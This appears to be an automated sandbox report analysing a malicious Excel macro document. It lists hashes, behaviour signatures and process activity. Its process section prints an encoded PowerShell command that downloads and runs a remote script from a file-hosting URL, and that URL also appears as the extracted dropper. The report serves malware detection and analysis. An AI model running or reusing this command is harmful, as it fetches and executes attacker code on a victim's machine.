Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 13:03

General

  • Target

    4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls

  • Size

    28KB

  • MD5

    14399d9b212ebf920943652ba1e7f5e3

  • SHA1

    2411de8a3f816645015e912bd92e5369c6e5b0c9

  • SHA256

    4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7

  • SHA512

    72f667df460361c44e51558fc09b035569bc570567ac732c25c5996f3e844170acf2d42439964993aeae04c41b7218226c5e989a7b9d78eacaf11b4a8b3f0c7b

  • SSDEEP

    384:i8LD/TZxA6ymevz2NsdHLpeAokr25Uen/WWA/E:rD/N+6devz2NsdHLQkr25U6We

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://oshi.at/LdxX

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Deletes itself 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
    1⤵
    • Deletes itself
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBvAHMAaABpAC4AYQB0AC8ATABkAHgAWAAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2180

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls

    Filesize

    68KB

    MD5

    f0dbcd4af1775996e48182125ffd6584

    SHA1

    d31ea4907103808ef8e80291a5cc5280ee3228b7

    SHA256

    01bf932002ed3a78abcefcb02585159197e7fbaa3ad4c8de032eb18d83265b40

    SHA512

    af59ce11d253f2a871506e14285a79432d3adcdaac3da1db4758a6e6dde24905f7d7d11c91b519c456e9f1f44dc4c8d94d4dd2bacc93eff0fa790e770f77787f

  • memory/2640-4-0x00000000003E0000-0x00000000004E0000-memory.dmp

    Filesize

    1024KB

  • memory/2640-2-0x00000000003E0000-0x00000000004E0000-memory.dmp

    Filesize

    1024KB

  • memory/2640-5-0x00000000003E0000-0x00000000004E0000-memory.dmp

    Filesize

    1024KB

  • memory/2640-7-0x00000000003E0000-0x00000000004E0000-memory.dmp

    Filesize

    1024KB

  • memory/2640-6-0x00000000003E0000-0x00000000004E0000-memory.dmp

    Filesize

    1024KB

  • memory/2640-1-0x000000007269D000-0x00000000726A8000-memory.dmp

    Filesize

    44KB

  • memory/2640-3-0x00000000003E0000-0x00000000004E0000-memory.dmp

    Filesize

    1024KB

  • memory/2640-15-0x000000007269D000-0x00000000726A8000-memory.dmp

    Filesize

    44KB

  • memory/2640-16-0x00000000003E0000-0x00000000004E0000-memory.dmp

    Filesize

    1024KB

  • memory/2640-17-0x00000000003E0000-0x00000000004E0000-memory.dmp

    Filesize

    1024KB

  • memory/2640-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2640-35-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2640-36-0x000000007269D000-0x00000000726A8000-memory.dmp

    Filesize

    44KB